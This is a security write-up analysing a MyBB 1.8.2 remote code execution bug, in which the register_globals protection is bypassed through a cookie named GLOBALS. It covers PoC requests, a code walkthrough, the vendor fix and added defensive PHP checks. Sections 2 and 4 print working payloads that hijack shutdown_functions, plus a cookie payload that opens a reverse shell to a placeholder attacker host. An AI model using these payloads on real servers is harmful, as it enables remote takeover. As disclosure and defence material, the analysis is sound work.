Contents
1. Vulnerability Description
2. Vulnerability Trigger Conditions
3. Vulnerability Impact Range
4. Vulnerability Code Analysis
5. Defense Methods
6. Defensive Thinking
1. Vulnerability description
MyBB's unset_globals() function can be bypassed under special conditions, which makes remote code execution possible.
Relevant Link:
https://cxsecurity.com/issue/WLB-2015120164
https://packetstormsecurity.com/files/134833/mybb-1.8.2-code-execution.html
https://www.exploit-db.com/exploits/35323/
2. Vulnerability Trigger Conditions
0x1: PoC 1
php.ini configuration:
1. request_order = "GP"
2. register_globals = On
// remote code execution by just using curl on the command line
3. curl --cookie "GLOBALS=1; shutdown_functions[0][function]=phpinfo; shutdown_functions[0][arguments][]=-1" http://30.9.192.207/mybb_1802/
PHP Automated Validation Scripts
0x2: PoC 2
php.ini configuration:
1. disable_functions = ini_get
2. register_globals = On
// URL
3. index.php?shutdown_functions[0][function]=phpinfo&shutdown_functions[0][arguments][]=-1
0x3: PoC 3
php.ini configuration:
1. request_order = "GP"
2. register_globals = On
// URL
curl --cookie "GLOBALS=1; shutdown_queries[]=sql_inj" http://www.target/css.php
// Works on disable_functions = ini_get and register_globals = on:
css.php?shutdown_queries[]=sql_inj
3. Vulnerability Impact Range
MyBB 1.8 <= 1.8.2 and MyBB 1.6 <= 1.6.15
4. Vulnerability Code Analysis
\mybb_1802\inc\class_core.php
...
// If we've got register globals on, then kill them too
/* When PHP's register_globals directive is on, MyBB calls unset_globals() so that every
   global variable PHP auto-registered from the $_POST, $_GET, $_FILES and $_COOKIE arrays
   is destroyed. This is a security mechanism MyBB applies at the beginning of every script
   request: it reverses the automatic registration of superglobal contents as globals, to
   counter the security problems register_globals can cause. */
if(@ini_get("register_globals") == 1)
{
    $this->unset_globals($_POST);
    $this->unset_globals($_GET);
    $this->unset_globals($_FILES);
    $this->unset_globals($_COOKIE);
}
...
/**
 * Unsets globals from a specific array.
 *
 * @param array The array to unset from.
 */
function unset_globals($array)
{
    if(!is_array($array))
    {
        return;
    }

    foreach(array_keys($array) as $key)
    {
        unset($GLOBALS[$key]);
        unset($GLOBALS[$key]); // Double unset to circumvent the zend_hash_del_key_or_index hole in PHP <4.4.3 and <5.1.4
    }
}
This logic looks correct and exists for defensive reasons, but because of some characteristics of the PHP engine, the unset_globals() protection can be bypassed:
1. Under normal circumstances, a variable supplied through GET/POST/COOKIE is unset from $GLOBALS[$var] even when register_globals is on. This is MyBB's own defense against the register_globals = On misconfiguration of older PHP versions, and it prevents local variables from being overwritten by request input.
2. But GLOBALS is a special variable: the $GLOBALS superglobal array is created and maintained by the PHP engine, it can be read and written anywhere in the program as $GLOBALS['key'], and the engine keeps the $GLOBALS array bound to the global symbol table.
3. If an attacker requests foo.php?GLOBALS=1, MyBB executes unset($GLOBALS["GLOBALS"]), which directly severs the binding between $GLOBALS and the global symbol table.
4. The direct consequence is that the parameter keys passed in through $_GET, $_POST and $_COOKIE can no longer be removed: the GPC parameters are unset through $GLOBALS, so once that binding is gone the unset operation no longer has any effect.
Note that MyBB's defensive code in \mybb_1802\inc\class_core.php already tries to catch this case:
...
function __construct()
{
    // Set up MyBB
    $protected = array("_GET", "_POST", "_SERVER", "_COOKIE", "_FILES", "_ENV", "GLOBALS");
    foreach($protected as $var)
    {
        if(isset($_REQUEST[$var]) || isset($_FILES[$var]))
        {
            die("Hacking attempt");
        }
    }
}
...
MyBB's intention is to reject any request parameter named _GET, _POST, GLOBALS and so on, because such a parameter could overwrite global variables. The problem is that $_REQUEST is itself a superglobal whose contents depend on php.ini: since PHP 5.3 the default php.ini sets request_order = "GP", meaning $_REQUEST only contains the GET and POST parameters. Sensitive parameter names delivered in a cookie are therefore never filtered, so an attacker can place the variable-overwrite payload in the cookie:
Globals=1; Shutdown_functions[0][function]=exec; shutdown_functions[0][arguments][]=php%20%2dr%20%27%24sock%3dfsockopen%28%22$yourip%22%2c%204444%29%3bexec%28% 22%2fbin%2fsh%20%2di%20%3c%263%20%3e%263%202%3e%263%22%29%3b%27;
To sum up, exploitation is possible under two sets of preconditions: register_globals = On together with request_order = "GP" (the protected names are delivered in a cookie, which the $_REQUEST-based check never sees), or register_globals = On together with disable_functions = ini_get (the @ini_get("register_globals") check silently fails, so unset_globals() is never called and plain GET parameters suffice).
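The following is an added example, not MyBB code, that turns the two precondition sets above into a check an administrator can run on a server. The function names (evaluate_preconditions, audit_live_server) are my own; it assumes PHP 7.0 or later and that get_cfg_var() is not itself disabled.

```php
<?php
// Added example, not part of MyBB. It evaluates the two precondition sets the
// page lists against a php.ini snapshot, and can also read the live server.

/**
 * Pure evaluation: given the three settings that matter, report which of the
 * page's scenarios applies. Returns an associative array of booleans.
 */
function evaluate_preconditions(bool $registerGlobals, string $requestOrder, bool $iniGetDisabled): array
{
    // $_REQUEST carries cookie values only if "C" appears in request_order
    // (or in variables_order, which PHP falls back to when request_order is empty).
    $cookieSkipped = stripos($requestOrder, 'C') === false;

    return [
        // PoC 1 / PoC 3: cookies are not in $_REQUEST, so the "GLOBALS" name
        // slips past the $_REQUEST-based "Hacking attempt" check.
        'cookie_bypass'         => $registerGlobals && $cookieSkipped,
        // PoC 2: ini_get() is disabled, so @ini_get("register_globals") == 1
        // is false and unset_globals() never runs; GET parameters suffice.
        'unset_globals_skipped' => $registerGlobals && $iniGetDisabled,
        // Neither scenario applies without register_globals (removed in PHP 5.4).
        'affected'              => $registerGlobals && ($cookieSkipped || $iniGetDisabled),
    ];
}

/** Snapshot the running interpreter and evaluate it. */
function audit_live_server(): array
{
    // A function listed in disable_functions is reported as missing by
    // function_exists(). Reading the directive through get_cfg_var() still
    // works in that case because it reads the parsed php.ini (assumption:
    // get_cfg_var() itself is not disabled).
    $iniGetDisabled = !function_exists('ini_get');

    $rg = $iniGetDisabled ? get_cfg_var('register_globals') : ini_get('register_globals');
    $registerGlobals = $rg !== false && filter_var($rg, FILTER_VALIDATE_BOOLEAN);

    $order = $iniGetDisabled ? get_cfg_var('request_order') : ini_get('request_order');
    if ($order === false || $order === '') {
        $order = $iniGetDisabled ? get_cfg_var('variables_order') : ini_get('variables_order');
    }

    return evaluate_preconditions($registerGlobals, (string) $order, $iniGetDisabled);
}

// Constructed snapshots matching the page's PoC configurations:
var_dump(evaluate_preconditions(true, 'GP', false));  // cookie_bypass => true (PoC 1 / 3)
var_dump(evaluate_preconditions(true, 'GPC', true));  // unset_globals_skipped => true (PoC 2)
var_dump(evaluate_preconditions(false, 'GP', false)); // affected => false (any PHP >= 5.4)
var_dump(audit_live_server());
```

Run it with `php audit.php` under the same php.ini the web server uses (or through the web SAPI), since CLI and web SAPIs often load different configuration files; the last var_dump is the one that matters for the real server.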
With the variable-overwrite precondition understood, the next step is to see how the payload is constructed and how it triggers the overwrite of a local variable, in \mybb_1802\inc\class_core.php:
class_core.php is included by almost every page script, so the following destructor is called very frequently:

function __destruct()
{
    // Run shutdown function
    if(function_exists("run_shutdown"))
    {
        run_shutdown();
    }
}
run_shutdown() is defined in \mybb_1802\inc\functions.php:
/**
 * Runs the shutdown items after the page has been sent to the browser.
 *
 */
function run_shutdown()
{
    // $shutdown_functions is initialized via the add_shutdown() function in init.php,
    // but because of the variable-overwrite vulnerability, $shutdown_functions can be hijacked here
    global $config, $db, $cache, $plugins, $error_handler, $shutdown_functions, $shutdown_queries, $done_shutdown, $mybb;

    if($done_shutdown == true || !$config || (isset($error_handler) && $error_handler->has_errors))
    {
        return;
    }
    ...
    // Run any shutdown functions if we have them
    if(is_array($shutdown_functions))
    {
        foreach($shutdown_functions as $function)
        {
            call_user_func_array($function['function'], $function['arguments']);
        }
    }
    ...
}
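The dispatcher above calls whatever the global $shutdown_functions array contains, which is why overwriting that one variable is enough. As an added example (not MyBB code; the names add_shutdown_global, run_shutdown_global and ShutdownRegistry are my own, and the injected callable is a harmless stand-in), here is the same dispatch shape beside a version whose registration list lives in private static state, which the global symbol table cannot reach. It assumes PHP 7.4 or later for the typed property.

```php
<?php
// Added example, not MyBB code. Vulnerable shape: a dispatcher in the style of
// run_shutdown(), driven by a global array that register_globals can overwrite.
// Hardened shape: a registry held in private static state, unreachable through
// the global symbol table. The callables used here are benign stand-ins.

$shutdown_functions = [];   // what init.php's add_shutdown() would populate

function add_shutdown_global(callable $function, array $arguments = []): void
{
    global $shutdown_functions;
    $shutdown_functions[] = ['function' => $function, 'arguments' => $arguments];
}

/** Vulnerable shape: whatever is in the global array gets called. Returns the
 *  list of callables it dispatched so the behaviour can be inspected. */
function run_shutdown_global(): array
{
    global $shutdown_functions;
    $ran = [];
    if (is_array($shutdown_functions)) {
        foreach ($shutdown_functions as $entry) {
            $ran[] = $entry['function'];
            call_user_func_array($entry['function'], $entry['arguments']);
        }
    }
    return $ran;
}

/** Hardened shape: entries are only reachable through add(), never through a
 *  variable name that request data could collide with. */
final class ShutdownRegistry
{
    private static array $entries = [];

    public static function add(callable $function, array $arguments = []): void
    {
        self::$entries[] = ['function' => $function, 'arguments' => $arguments];
    }

    public static function run(): array
    {
        $ran = [];
        foreach (self::$entries as $entry) {
            $ran[] = $entry['function'];
            call_user_func_array($entry['function'], $entry['arguments']);
        }
        self::$entries = [];   // run once, like $done_shutdown in MyBB
        return $ran;
    }
}

// Legitimate registration, as init.php would do.
add_shutdown_global('gc_collect_cycles');
ShutdownRegistry::add('gc_collect_cycles');

// Simulate the effect the page describes: with register_globals on, a request
// key named shutdown_functions lands in the global symbol table and replaces
// the array. The injected callable is harmless here.
$GLOBALS['shutdown_functions'] = [['function' => 'phpversion', 'arguments' => []]];

var_dump(run_shutdown_global());   // ["phpversion"]: the injected entry ran, the real one was lost
var_dump(ShutdownRegistry::run());  // ["gc_collect_cycles"]: private state was untouched
```

The design point is that the `callable` type hint is not the protection (a string such as "exec" is a valid callable); the protection is that the registration list is not a global variable, so no request-controlled name can alias it.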
Relevant Link:
http://0day.today/exploit/22913
5. Defense Methods
\inc\class_core.php
class MyBB
{
    ...
    function __construct()
    {
        // Set up MyBB
        $protected = array("_GET", "_POST", "_SERVER", "_COOKIE", "_FILES", "_ENV", "GLOBALS");
        foreach($protected as $var)
        {
            /* if(isset($_REQUEST[$var]) || isset($_FILES[$var])) */
            if(isset($_GET[$var]) || isset($_POST[$var]) || isset($_COOKIE[$var]) || isset($_FILES[$var]))
            {
                die("Hacking attempt");
            }
        }
    ...
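To make concrete both why the original $_REQUEST-based check (section 4) misses a cookie under request_order = "GP" and why the per-source check in the fix above does not, here is an added example, not MyBB code. It models how PHP assembles $_REQUEST from request_order; the names build_request, protected_key_in_request and protected_key_in_sources are my own, and it assumes PHP 7.1 or later for the nullable return types.

```php
<?php
// Added example, not MyBB code. Reproduces how PHP builds $_REQUEST from
// request_order and compares the pre-1.8.3 check with the 1.8.3-style check.

const PROTECTED_VARS = ['_GET', '_POST', '_SERVER', '_COOKIE', '_FILES', '_ENV', 'GLOBALS'];

/**
 * Mimic PHP's construction of $_REQUEST: sources are merged in the order given
 * by request_order, later sources overwriting earlier ones. Letters not in
 * G, P, C are ignored, as PHP does for $_REQUEST.
 */
function build_request(string $request_order, array $get, array $post, array $cookie): array
{
    $sources = ['G' => $get, 'P' => $post, 'C' => $cookie];
    $request = [];
    foreach (str_split(strtoupper($request_order)) as $letter) {
        if (isset($sources[$letter])) {
            $request = array_merge($request, $sources[$letter]);
        }
    }
    return $request;
}

/** The pre-1.8.3 check: looks only at $_REQUEST and $_FILES.
 *  Returns the offending name, or null when nothing was found. */
function protected_key_in_request(array $request, array $files): ?string
{
    foreach (PROTECTED_VARS as $var) {
        if (isset($request[$var]) || isset($files[$var])) {
            return $var;
        }
    }
    return null;
}

/** The 1.8.3-style check: inspects every input source explicitly.
 *  Returns "source:name" of the first hit, or null when the request is clean. */
function protected_key_in_sources(array $get, array $post, array $cookie, array $files): ?string
{
    $sources = ['_GET' => $get, '_POST' => $post, '_COOKIE' => $cookie, '_FILES' => $files];
    foreach ($sources as $name => $arr) {
        foreach (PROTECTED_VARS as $var) {
            if (isset($arr[$var])) {
                return "$name:$var";
            }
        }
    }
    return null;
}

// Constructed request modelled on PoC 1: the protected name arrives in the cookie.
$get    = ['page' => 'index'];
$post   = [];
$cookie = ['GLOBALS' => '1', 'mybb_lang' => 'en'];
$files  = [];

$request_gp  = build_request('GP', $get, $post, $cookie);   // php.ini default since 5.3
$request_gpc = build_request('GPC', $get, $post, $cookie);

var_dump(protected_key_in_request($request_gp, $files));          // NULL: cookie never reaches $_REQUEST
var_dump(protected_key_in_request($request_gpc, $files));         // string(7) "GLOBALS"
var_dump(protected_key_in_sources($get, $post, $cookie, $files)); // string(15) "_COOKIE:GLOBALS"
```

The lesson carried by the fix is general: an input-validation check must enumerate the concrete sources it defends against, not a derived view such as $_REQUEST whose composition is decided by configuration outside the application.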
Relevant Link:
http://blog.mybb.com/2014/11/20/mybb-1-8-3-1-6-16-released-security-releases/
http://cn.313.ninja/exploit/22913
6. Defensive Thinking
Copyright (c) Little5ann All rights reserved